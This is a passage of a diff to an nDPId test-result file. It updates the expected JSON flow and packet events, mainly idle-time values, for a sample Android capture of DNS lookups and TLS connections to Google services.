+01040{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":257,"source":"android.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454871069,"flow_last_seen":1582454871207,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454871207,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32988,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.PlayStore","breed":"Safe","category":"SoftwareUpdate"},"tls": {"version":"TLSv1.2","client_requested_server_name":"android.clients.google.com","ja3":"9c815150ea821166faecf80757d8826a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00904{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":260,"source":"android.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454871152,"flow_last_seen":1582454871230,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1598,"flow_avg_l4_payload_len":266,"midstream":0,"thread_ts_msec":1582454871230,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32996,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.google.com","ja3":"6ec2896feff5746955f700c0023f5804","ja3s":"eca9b8f0f3eae50309eaf901cb822d9b","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1"}} +01154{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":261,"source":"android.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1582454871152,"flow_last_seen":1582454871230,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":2734,"flow_avg_l4_payload_len":390,"midstream":0,"thread_ts_msec":1582454871230,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32996,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.google.com","server_names":"www.google.com","ja3":"6ec2896feff5746955f700c0023f5804","ja3s":"eca9b8f0f3eae50309eaf901cb822d9b","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Google Trust Services, CN=GTS CA 1O1","subjectDN":"C=US, ST=California, L=Mountain View, O=Google LLC, CN=www.google.com","alpn":"http\/1.1","fingerprint":"32:07:6C:9F:96:7D:CE:82:15:C6:C5:7B:49:90:53:A1:CF:80:4F:B0"}} +01081{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":264,"source":"android.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454871069,"flow_last_seen":1582454871237,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1935,"flow_avg_l4_payload_len":322,"midstream":0,"thread_ts_msec":1582454871237,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32988,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.PlayStore","breed":"Safe","category":"SoftwareUpdate"},"tls": {"version":"TLSv1.3","client_requested_server_name":"android.clients.google.com","ja3":"9c815150ea821166faecf80757d8826a","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":274,"source":"android.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871292,"flow_last_seen":1582454871292,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1582454871292,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":46359,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":274,"source":"android.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":1,"flow_last_seen":1582454871292,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"thread_ts_msec":1582454871292,"pkt":"xiwDYGpkTGr2n\/YnCABFAABBq9RAAEARCXbAqAIQwKgCAbUXADUALUF1Da4BAAABAAAAAAAACGFjY291bnRzBmdvb2dsZQNjb20AAAEAAQ=="} 00774{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":274,"source":"android.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871292,"flow_last_seen":1582454871292,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1582454871292,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":46359,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"accounts.google.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":276,"source":"android.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":2,"flow_last_seen":1582454871294,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":95,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":95,"pkt_l4_len":61,"thread_ts_msec":1582454871294,"pkt":"TGr2n\/YnxiwDYGpkCABFAABRfN0AAEAReF3AqAIBwKgCEAA1tRcAPWwTDa6BgAABAAEAAAAACGFjY291bnRzBmdvb2dsZQNjb20AAAEAAcAMAAEAAQAAANoABNjvJng="} 00789{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":276,"source":"android.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454871292,"flow_last_seen":1582454871294,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1582454871294,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":46359,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"accounts.google.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"216.239.38.120"}} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":280,"source":"android.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871321,"flow_last_seen":1582454871321,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454871321,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32998,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":280,"source":"android.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":1,"flow_last_seen":1582454871321,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871321,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8nfFAAEAG2qrAqAIQ2O8meIDmAbsuQarwAAAAAKAC\/\/\/zCgAAAgQFtAQCCAr\/\/zcBAAAAAAEDAwg="} -00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":284,"source":"android.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":2,"flow_last_seen":1582454871334,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871334,"pkt":"TGr2n\/YnxiwDYGpkCABFAAA8saEAAHUG0frY7yZ4wKgCEAG7gOY64cVhLkGq8aAS6yCKsAAAAgQFZAQCCAofL14G\/\/83AQEDAwg="} -00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":286,"source":"android.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":3,"flow_last_seen":1582454871335,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454871335,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA0nfJAAEAG2rHAqAIQ2O8meIDmAbsuQarxOuHFYoAQAVei8wAAAQEICv\/\/NwUfL14G"} -00918{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":288,"source":"android.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454871321,"flow_last_seen":1582454871339,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454871339,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32998,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"accounts.google.com","ja3":"66918128f1b9b03303d77c6f2eefd128","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":280,"source":"android.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871321,"flow_last_seen":1582454871321,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454871321,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32998,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":280,"source":"android.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":1,"flow_last_seen":1582454871321,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871321,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8nfFAAEAG2qrAqAIQ2O8meIDmAbsuQarwAAAAAKAC\/\/\/zCgAAAgQFtAQCCAr\/\/zcBAAAAAAEDAwg="} +00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":284,"source":"android.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":2,"flow_last_seen":1582454871334,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871334,"pkt":"TGr2n\/YnxiwDYGpkCABFAAA8saEAAHUG0frY7yZ4wKgCEAG7gOY64cVhLkGq8aAS6yCKsAAAAgQFZAQCCAofL14G\/\/83AQEDAwg="} +00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":286,"source":"android.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":3,"flow_last_seen":1582454871335,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454871335,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA0nfJAAEAG2rHAqAIQ2O8meIDmAbsuQarxOuHFYoAQAVei8wAAAQEICv\/\/NwUfL14G"} +00918{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":288,"source":"android.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454871321,"flow_last_seen":1582454871339,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454871339,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32998,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"accounts.google.com","ja3":"66918128f1b9b03303d77c6f2eefd128","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":291,"source":"android.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871343,"flow_last_seen":1582454871343,"flow_idle_time":180000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":52,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1582454871343,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":35689,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":291,"source":"android.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":1,"flow_last_seen":1582454871343,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":94,"pkt_l4_len":60,"thread_ts_msec":1582454871343,"pkt":"xiwDYGpkTGr2n\/YnCABFAABQq9VAAEARCWbAqAIQwKgCAYtpADUAPJHqlgwBAAABAAAAAAAAE3NlbWFudGljbG9jYXRpb24tcGEKZ29vZ2xlYXBpcwNjb20AAAEAAQ=="} 00797{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":291,"source":"android.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871343,"flow_last_seen":1582454871343,"flow_idle_time":180000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":52,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1582454871343,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":35689,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.GoogleServices","breed":"Acceptable","category":"Web"},"dns": {"query":"semanticlocation-pa.googleapis.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} -00959{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":298,"source":"android.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1582454871321,"flow_last_seen":1582454871370,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1935,"flow_avg_l4_payload_len":276,"midstream":0,"thread_ts_msec":1582454871370,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32998,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"accounts.google.com","ja3":"66918128f1b9b03303d77c6f2eefd128","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00959{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":298,"source":"android.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1582454871321,"flow_last_seen":1582454871370,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1935,"flow_avg_l4_payload_len":276,"midstream":0,"thread_ts_msec":1582454871370,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32998,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"accounts.google.com","ja3":"66918128f1b9b03303d77c6f2eefd128","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00529{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":310,"source":"android.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":2,"flow_last_seen":1582454871383,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":110,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":110,"pkt_l4_len":76,"thread_ts_msec":1582454871383,"pkt":"TGr2n\/YnxiwDYGpkCABFAABgqGIAAEARTMnAqAIBwKgCEAA1i2kATI9glgyBgAABAAEAAAAAE3NlbWFudGljbG9jYXRpb24tcGEKZ29vZ2xlYXBpcwNjb20AAAEAAcAMAAEAAQAAALIABKzZFEo="} 00812{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":310,"source":"android.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454871343,"flow_last_seen":1582454871383,"flow_idle_time":180000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":120,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1582454871383,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":35689,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.GoogleServices","breed":"Acceptable","category":"Web"},"dns": {"query":"semanticlocation-pa.googleapis.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"172.217.20.74"}} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":324,"source":"android.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871496,"flow_last_seen":1582454871496,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1582454871496,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":22850,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} @@ -221,48 +221,48 @@ 00770{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":324,"source":"android.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871496,"flow_last_seen":1582454871496,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1582454871496,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":22850,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.DataSaver","breed":"Fun","category":"Web"},"dns": {"query":"proxy.googlezip.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":332,"source":"android.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":2,"flow_last_seen":1582454871536,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":95,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":95,"pkt_l4_len":61,"thread_ts_msec":1582454871536,"pkt":"TGr2n\/YnxiwDYGpkCABFAABRnZYAAEARV6TAqAIBwKgCEAA1WUIAPff70TGBgAABAAEAAAAABXByb3h5CWdvb2dsZXppcANuZXQAAAEAAcAMAAEAAQAAAJMABKzZFEw="} 00784{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":332,"source":"android.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454871496,"flow_last_seen":1582454871536,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1582454871536,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":22850,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.DataSaver","breed":"Fun","category":"Web"},"dns": {"query":"proxy.googlezip.net","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"172.217.20.76"}} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":335,"source":"android.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871553,"flow_last_seen":1582454871553,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454871553,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.76","src_port":43634,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":335,"source":"android.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":1,"flow_last_seen":1582454871553,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871553,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8o7ZAAEAGEyjAqAIQrNkUTKpyAbt9gJSNAAAAAKAC\/\/\/OqgAAAgQFtAQCCAr\/\/zc7AAAAAAEDAwg="} -00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":336,"source":"android.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":2,"flow_last_seen":1582454871591,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871591,"pkt":"TGr2n\/YnxiwDYGpkCABFAAA8n5IAAHUGIkys2RRMwKgCEAG7qnIP+mJJfYCUjqAS6yAAJQAAAgQFZAQCCAqRSuAV\/\/83OwEDAwg="} -00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":337,"source":"android.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":3,"flow_last_seen":1582454871592,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454871592,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA0o7dAAEAGEy\/AqAIQrNkUTKpyAbt9gJSOD\/piSoAQAVcYYgAAAQEICv\/\/N0WRSuAV"} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":335,"source":"android.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871553,"flow_last_seen":1582454871553,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454871553,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.76","src_port":43634,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":335,"source":"android.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":1,"flow_last_seen":1582454871553,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871553,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8o7ZAAEAGEyjAqAIQrNkUTKpyAbt9gJSNAAAAAKAC\/\/\/OqgAAAgQFtAQCCAr\/\/zc7AAAAAAEDAwg="} +00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":336,"source":"android.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":2,"flow_last_seen":1582454871591,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871591,"pkt":"TGr2n\/YnxiwDYGpkCABFAAA8n5IAAHUGIkys2RRMwKgCEAG7qnIP+mJJfYCUjqAS6yAAJQAAAgQFZAQCCAqRSuAV\/\/83OwEDAwg="} +00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":337,"source":"android.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":3,"flow_last_seen":1582454871592,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454871592,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA0o7dAAEAGEy\/AqAIQrNkUTKpyAbt9gJSOD\/piSoAQAVcYYgAAAQEICv\/\/N0WRSuAV"} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":338,"source":"android.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871600,"flow_last_seen":1582454871600,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1582454871600,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":58892,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 